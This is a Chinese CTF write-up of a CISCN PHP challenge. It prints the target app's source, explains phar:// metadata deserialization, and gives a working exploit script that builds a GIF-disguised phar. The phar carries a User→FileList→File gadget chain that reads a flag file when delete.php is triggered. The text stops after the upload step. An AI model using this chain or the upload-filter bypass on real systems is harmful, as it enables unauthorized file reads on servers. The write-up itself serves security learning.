0X01 前言
记录一道CISCN的真题,让我对phar反序列化有更深层次的理解和应用,也对代码审计有了新的感悟,知道了在不使用php函数unserialize()同样引起PHP对象注入
参考链接:
https://xz.aliyun.com/t/2715
https://www.cnblogs.com/kevinbruce656/p/11316070.html
0X02 正文
首先这道题让我们注册,成功注册后发现是一个文件上传页面
dirb扫描路径也是无果,无奈之下我删除了一些文件,同样也下载了文件,但当我抓下载包的时候发现:
index.php、download.php和class.php以及delete.php其中前三者都是抓包能够得到有这三个PHP文件存在,对应着三种功能,而class.php则是被include()进去的,因此同样下载了过来。
index.php:
<?php
include "class.php";
$a = new FileList($_SESSION['sandbox']);
$a->Name();
$a->Size();
?>//省略了无关的html页面代码
download.php:
<?php
session_start();
if (!isset($_SESSION['login'])) {
header("Location: login.php");
die();
}
if (!isset($_POST['filename'])) {
die();
}
include "class.php";
ini_set("open_basedir", getcwd() . ":/etc:/tmp");
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) {
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=" . basename($filename));
echo $file->close();
} else {
echo "File not exist";
}
?>
delete.php:
<?php
session_start();
if (!isset($_SESSION['login'])) {
header("Location: login.php");
die();
}
if (!isset($_POST['filename'])) {
die();
}
include "class.php";
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
$file->detele();
Header("Content-type: application/json");
$response = array("success" => true, "error" => "");
echo json_encode($response);
} else {
Header("Content-type: application/json");
$response = array("success" => false, "error" => "File not exist");
echo json_encode($response);
}
?>
class.php:
<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);
class User {
public $db;
public function __construct() {
global $db;
$this->db = $db; //引用全局变量$db
}
public function user_exist($username) {
$stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->store_result();
$count = $stmt->num_rows;
if ($count === 0) {
return false;
}
return true;
}
public function add_user($username, $password) {
if ($this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
return true;
}
public function verify_user($username, $password) {
if (!$this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->bind_result($expect);
$stmt->fetch();
if (isset($expect) && $expect === $password) {
return true;
}
return false;
}
public function __destruct() {
$this->db->close(); //User类$db调用close函数,而User类没有close函数
}
}
class FileList {
private $files;
private $results;
private $funcs;
public function __construct($path) {
$this->files = array();
$this->results = array();
$this->funcs = array();
$filenames = scandir($path);
$key = array_search(".", $filenames);
unset($filenames[$key]);
$key = array_search("..", $filenames);
unset($filenames[$key]);
foreach ($filenames as $filename) {
$file = new File();
$file->open($path . $filename);
array_push($this->files, $file);
$this->results[$file->name()] = array();
}
}
public function __call($func, $args) {//调用魔法函数__call
array_push($this->funcs, $func);
foreach ($this->files as $file) {
$this->results[$file->name()][$func] = $file->$func();
}
}
public function __destruct() {
$table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
$table .= '<thead><tr>';
foreach ($this->funcs as $func) {
$table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
}
$table .= '<th scope="col" class="text-center">Opt</th>';
$table .= '</thead><tbody>';
foreach ($this->results as $filename => $result) {
$table .= '<tr>';
foreach ($result as $func => $value) {
$table .= '<td class="text-center">' . htmlentities($value) . '</td>';
}
$table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>';
$table .= '</tr>';
}
echo $table;
}
}
class File {
public $filename;
public function open($filename) {
$this->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true;
} else {
return false;
}
}
public function name() {
return basename($this->filename);
}
public function size() {
$size = filesize($this->filename);
$units = array(' B', ' KB', ' MB', ' GB', ' TB');
for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
return round($size, 2).$units[$i];
}
public function detele() {
unlink($this->filename);
}
public function close() {
return file_get_contents($this->filename);//调用file_get_contents
}
}
?>
PHP5 的对象新增了一个专用方法 __call(),这个方法用来监视一个对象中的其它方法。如果你试着调用一个对象中不存在的方法,__call 方法将会被自动调用
我们需要仔细研究的就是class.php,而魔术方法__call则给予了我们强烈的暗示,至此我们先来看一下phar反序列化是啥?
phar文件是php的压缩文件,它可以把多个文件归档到同一个文件中,而且不经过解压就能被 php 访问并执行,phar://与file:// ,php://等类似,也是一种流包装器。
phar文件结构:
1、stub
一个供phar扩展用于识别的标志,格式为xxx<?php xxx; __HALT_COMPILER();?>,注意此处必须以__HALT_COMPILER();?>结尾,但前面的内容没有限制,也就是说我们可以在前面轻易伪造一个图片文件的头如GIF98a来绕过一些上传限制;
2、manifest
phar文件本质上是一种压缩文件,每个被压缩文件的权限、属性等信息都放在这部分。另外,这部分还会以序列化的形式存储用户自定义的meta-data,这就是触发反序列化的点,当file_exists(),fopen(),file_get_contents(),file()等文件操作函数通过phar://伪协议解析phar文件时就会将数据反序列化。
3、contents
被压缩文件的内容,不是主要的点。
4、signature
签名,放在文件末尾.
phar的利用条件:
① phar文件要能够上传到服务器端
② 要有可用的魔术方法作为“跳板”
③ 要有文件操作函数,如file_exists(),fopen(),file_get_contents(),file()
③ 文件操作函数的参数可控,且:、/、phar等特殊字符没有被过滤
我们可以知道有了魔法函数__call()和file_get_contents()我们应该考虑利用file_get_content来获取flag,而在download.php中有
if (strlen($filename) < 40 && $file->open($filename)
&& stristr($filename, "flag") === false)
即上传文件名不能包含flag,也证实了flag文件应该就在本目录的flag.txt或者flag.php。
接下来开始分析class.php:
我们发现要调用file_get_contents()函数,则必须调用File类中的close()函数,还出现一次close(),是在User类的析构函数中:
User类并没有定义close()函数,整理一下:File类中的close方法会获取文件内容,如果能触发该方法,就有可能获取flag。
User类中存在close方法,并且该方法在对象销毁时执行。
同时FileList类中存在call魔术方法,并且类没有close方法。
我们的思路出来了:
如果一个Filelist对象调用了close()方法,根据call魔法函数,File的close方法会被执行,就可能拿到flag。
这个时候我们就要借用到phar://伪协议,因为file_get_contents()读取内容是是能读将phar反序列化的。
Tips:在php.ini中修改readonly = Off才能生成phar文件
[Phar]
; http://php.net/phar.readonly
phar.readonly = Off (注意前面没有分号)
EXP:
<?php
class User{
public $db;
}
class FileList{
private $files;
public function __construct(){
$this->files = array(new File()); //方便在__call()函数中便能调用File()中的close()函数
}
}
class File{
public $filename = '/flag.txt';
}
//这是创建phar文件的常规姿势
$phar = new Phar('phar.phar');
$phar ->startBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>'); //设置stub,增加gif文件头
$phar ->addFromString('test.txt','test'); //添加要压缩的文件
$object = new User();//创建一个User类的对象
$object->db = new FileList();//将object的$db变量设置为新的FileList类的一个对象
$phar -> setMetadata($object);//将自定义meta-data存入manifest
$phar -> stopBuffering();
?>
我们生成phar.phar文件后,记得改名为phar.gif绕过上传,但实质读取Phar文件是没有任何影响的。
接下来上传phar.gif文件:
注意:
download.php中限制了访问目录为当前目录和/etc、/tmp,也就意味着我们无法通过访问download.php来跨目录访问/flag.txt,因此在这里只能通过delete.php来得到flag。
